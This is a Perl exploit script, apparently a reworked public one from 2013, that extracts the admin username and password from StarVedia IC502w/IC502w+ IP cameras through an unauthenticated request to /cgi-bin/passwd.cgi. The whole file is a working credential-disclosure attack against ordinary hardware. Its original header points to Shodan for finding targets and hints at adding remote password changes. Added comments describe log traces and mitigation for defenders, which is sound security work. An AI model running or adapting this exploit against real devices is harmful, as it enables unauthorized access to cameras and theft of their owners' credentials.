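#!/usr/bin/perl
#
#[+] StarVedia IPCamera IC502w IC502w+ v020313 remote bypass username/password disclosure exploit
#Author: Todor Donev
#Email: todor.donev at gmail dot com
#Type: Hardware
#
#Thanks to Tsvetelina Emirska the best friend in my life
#and all my other friends for the help and support which
#gives me. Kind regards to all of you, who read my lil'
#exploits.
#Bulgaria, Sofia
#03.2013
#
#Shodanhq r0x 4 teh lulz!!
#http://www.youtube.com/watch?v=qNyN1AY-YZQ
#Cheeerzz =))
#
#Another bug, hint: you can edit this code and add some lines for remote change the password.
#####
#
# What the script does: it sends one plain HTTP GET for /cgi-bin/passwd.cgi
# to the given host[:port], supplying no credentials, and reads the account
# name and password out of the value="..." attributes of the "user" and
# "passwd" form fields in the returned HTML.
#
# For defenders: requests for /cgi-bin/passwd.cgi from hosts that are not
# the camera's administrators are the observable trace of this check in
# web, proxy or IDS logs. Keep the camera's web interface off untrusted
# networks, and treat the stored credentials as exposed (rotate them, and
# any account that reuses them) on a device that answers this request.
# The page names firmware v020313 as affected; no fixed release is named.

use strict;
use warnings;
use LWP::Simple;

# Exactly two arguments are accepted: the option and the target. The old
# shift-in-pairs loop let a later pair silently overwrite an earlier one and
# left the target undefined when only one argument was given.
usg() if @ARGV != 2;
my ($type, $t) = @ARGV;

# Only -d is implemented; any other option used to exit silently.
usg() if $type ne '-d';

# get() returns undef on any failure (connection error, timeout, non-2xx
# status). It does not set $!, so the old message printed an unrelated errno.
# A failed fetch also does not show the device is unaffected, so say so.
my $r = get("http://$t/cgi-bin/passwd.cgi?");
die(" $t: no usable response from /cgi-bin/passwd.cgi (unreachable or not vulnerable)\n")
    unless defined $r;

print " [+] StarVedia IPCamera IC502w IC502w+ v020313 remote bypass username/password disclosure exploit\n";
print " [!] Exploiting: $t\n";

my $result = '';

# No /g on these matches: in scalar context /g resumes from the position of
# the previous match, so the second pattern could never match a field that
# appears earlier in the page than the first. [^"]* keeps the capture inside
# one attribute value, where the greedy (.*) ran on to the last "> on the line.
if ($r =~ m/<INPUT type=text name=user size=20 maxlength=19 value="([^"]*)">/) {
    $result .= " [o] User: $1\n";
}
else {
    die(" Try another exploit\n");
}

if ($r =~ m/<INPUT type=password name=passwd size=20 maxlength=19 value="([^"]*)">/) {
    $result .= " [o] Password: $1\n";
}
else {
    die("Try another exploit or restart the exploit\n");
}

print " [\\m/] BINGO!!!\n\a" . $result;

# Print the usage text and exit. Declared without the empty prototype and
# called as usg() rather than &usg, which would pass the caller's @_ along.
sub usg {
    print " [!] usg: perl $0 -d <victim:port>\n";
    print " [!]-d: disclosure password option\n";
    print " [!] exp: perl $0 -d 127.0.0.1 :)\n";
    exit;
}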